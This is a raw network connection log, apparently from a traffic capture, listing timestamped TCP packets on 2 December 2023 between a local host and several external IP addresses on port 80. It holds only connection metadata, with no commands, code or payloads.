                                                                        Dec 2, 2023 18:49:59.735424995 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.735462904 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.735743999 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.735761881 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.735800028 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.736120939 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.736140966 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.736193895 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.736449003 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.736469030 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.736512899 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.736896038 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.736913919 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.736951113 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.737270117 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.737287045 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.737333059 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.737605095 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.737643957 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.737693071 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.952867985 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.952894926 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.952961922 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.953140020 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.953185081 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.953218937 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.953490019 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.953507900 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.953550100 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.953835011 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.953855038 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.953906059 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:00.847038031 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:01.852623940 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.074076891 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.074220896 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.074521065 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.294306040 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.294822931 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.294840097 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.294924974 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.295180082 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.295196056 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.295255899 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.295440912 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.295531034 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.295572996 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.295792103 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.295809984 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.295847893 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.296099901 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.296118021 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.296152115 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.515168905 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.515196085 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.515315056 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.515466928 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.515506983 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.515573025 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.516094923 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.516115904 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.516165972 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.516577005 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.516594887 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.516634941 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.517004013 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.517023087 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.517076015 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.517523050 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.517540932 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.517585993 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.517993927 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.518016100 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.518059969 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.519334078 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.519351006 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.519395113 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.519399881 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.519418955 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.519473076 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.519845009 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.519864082 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.519915104 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.735522985 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.735543966 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.735589981 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.735852003 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.735866070 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.735909939 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.736315966 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.736329079 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.736376047 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.736824036 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.736877918 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.736918926 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.737330914 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.737344027 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.737386942 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.738214970 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.738229036 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.738281965 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.738645077 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.738660097 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.738698959 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.739499092 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.739514112 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.739552975 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.740014076 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.740030050 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.740072966 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.740545034 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.740559101 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.740603924 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.741038084 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.741051912 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.741091013 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.741600037 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.741614103 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.741655111 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.741970062 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.741982937 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.742026091 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.742397070 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.742456913 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.742494106 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.742968082 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.742981911 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.743020058 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.743577003 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.743597031 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.743649006 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.743834019 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.743853092 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.743900061 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.744313002 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.744513035 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.744565964 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.744771957 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.744786024 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.744822979 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.745286942 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.745300055 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.745338917 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.955713034 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.955775023 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.955828905 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.956059933 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.956078053 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.956118107 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.956578970 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.956593990 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.956628084 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.957001925 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.957019091 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.957052946 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.957371950 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.957386017 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.957432032 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.957703114 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.957717896 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.957751036 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.958007097 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.958023071 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.958070040 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.958399057 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.958414078 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.958448887 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.958719969 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.958734035 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.958775043 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.959068060 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.959084988 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.959119081 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.959378004 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.959392071 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.959425926 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.959673882 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.959687948 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.959722042 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.960011005 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.960025072 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.960063934 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.960315943 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.960331917 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.960371971 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.960751057 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.960764885 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.960799932 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.960983038 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.960997105 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.961035013 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.961414099 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.961429119 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.961483002 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.961689949 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.961705923 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.961743116 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.961982965 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:56.521075010 CET804973934.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:56.521106005 CET804973934.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:56.708125114 CET804973934.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:56.711246014 CET804973934.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:56.711287022 CET804973934.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:56.711335897 CET4973980192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:56.711390972 CET4973980192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:57.930401087 CET4973980192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:58.946628094 CET4974080192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:59.045460939 CET804974034.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:59.045614958 CET4974080192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:59.045965910 CET4974080192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:59.144642115 CET804974034.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:59.332140923 CET804974034.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:59.345099926 CET804974034.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:59.345117092 CET804974034.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:59.345129967 CET804974034.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:59.345143080 CET804974034.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:59.345155001 CET804974034.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:59.345165968 CET804974034.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:59.345166922 CET4974080192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:59.345235109 CET4974080192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:59.345269918 CET4974080192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:59.345500946 CET4974080192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:59.444411039 CET804974034.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:51:04.649286985 CET4974180192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:04.849555016 CET804974181.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:04.849684954 CET4974180192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:04.850024939 CET4974180192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:05.050493002 CET804974181.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:05.052381992 CET804974181.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:05.052422047 CET804974181.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:05.052515030 CET4974180192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:06.352212906 CET4974180192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:07.466618061 CET4974280192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:07.671005964 CET804974281.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:07.671163082 CET4974280192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:08.962429047 CET4974280192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:09.166683912 CET804974281.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:09.168382883 CET804974281.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:09.168411016 CET804974281.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:09.168499947 CET4974280192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:10.477155924 CET4974280192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:11.493082047 CET4974380192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:11.697715044 CET804974381.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:11.697828054 CET4974380192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:11.698075056 CET4974380192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:11.902755022 CET804974381.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:11.903847933 CET804974381.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:11.903867960 CET804974381.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:11.903975010 CET4974380192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:13.211555004 CET4974380192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:14.227427959 CET4974480192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:14.431751013 CET804974481.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:14.431845903 CET4974480192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:14.432070971 CET4974480192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:14.637274027 CET804974481.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:14.637300014 CET804974481.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:14.637312889 CET804974481.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:14.637531996 CET4974480192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:14.638317108 CET4974480192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:14.842631102 CET804974481.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:20.231798887 CET4974580192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:20.453620911 CET804974585.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:20.453897953 CET4974580192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:20.454240084 CET4974580192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:20.675563097 CET804974585.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:20.737898111 CET804974585.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:20.738049984 CET4974580192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:21.961494923 CET4974580192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:22.977411985 CET4974680192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:23.200027943 CET804974685.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:23.200203896 CET4974680192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:23.200404882 CET4974680192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:23.421757936 CET804974685.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:23.484241962 CET804974685.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:23.484343052 CET4974680192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:24.954361916 CET4974680192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:26.648267031 CET4974780192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:26.871162891 CET804974785.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:26.871258974 CET4974780192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:26.871557951 CET4974780192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:27.093024015 CET804974785.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:27.153484106 CET804974785.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:27.155056000 CET804974785.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:27.155147076 CET4974780192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:28.383369923 CET4974780192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:29.399389982 CET4974880192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:29.623025894 CET804974885.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:29.623197079 CET4974880192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:29.623502016 CET4974880192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:29.848659992 CET804974885.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:29.848989964 CET4974880192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:29.849419117 CET4974880192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:30.073391914 CET804974885.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:35.115281105 CET4974980192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:35.304783106 CET8049749162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:35.304996967 CET4974980192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:35.305404902 CET4974980192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:35.497416019 CET8049749162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:35.506577969 CET8049749162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:35.506777048 CET8049749162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:35.506958008 CET4974980192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:36.820709944 CET4974980192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:37.837029934 CET4975080192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:38.028392076 CET8049750162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:38.028513908 CET4975080192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:38.028748989 CET4975080192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:38.217689037 CET8049750162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:38.231230974 CET8049750162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:38.231465101 CET8049750162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:38.231525898 CET4975080192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:39.539578915 CET4975080192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:40.555996895 CET4975180192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:40.748784065 CET8049751162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:40.748889923 CET4975180192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:40.749174118 CET4975180192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:40.938920021 CET8049751162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:40.952306032 CET8049751162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:40.952548027 CET8049751162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:40.952725887 CET4975180192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:42.265913010 CET4975180192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:44.472038984 CET4975280192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:44.660443068 CET8049752162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:44.660608053 CET4975280192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:44.660860062 CET4975280192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:44.848968983 CET8049752162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:44.861386061 CET8049752162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:44.861771107 CET8049752162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:44.861960888 CET4975280192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:44.862195015 CET4975280192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:45.050179958 CET8049752162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:50.535861015 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:50.721146107 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:50.721328974 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:50.721636057 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:50.906644106 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:51.892266989 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:51.892296076 CET8049753185.74.252.11192.168.2.10
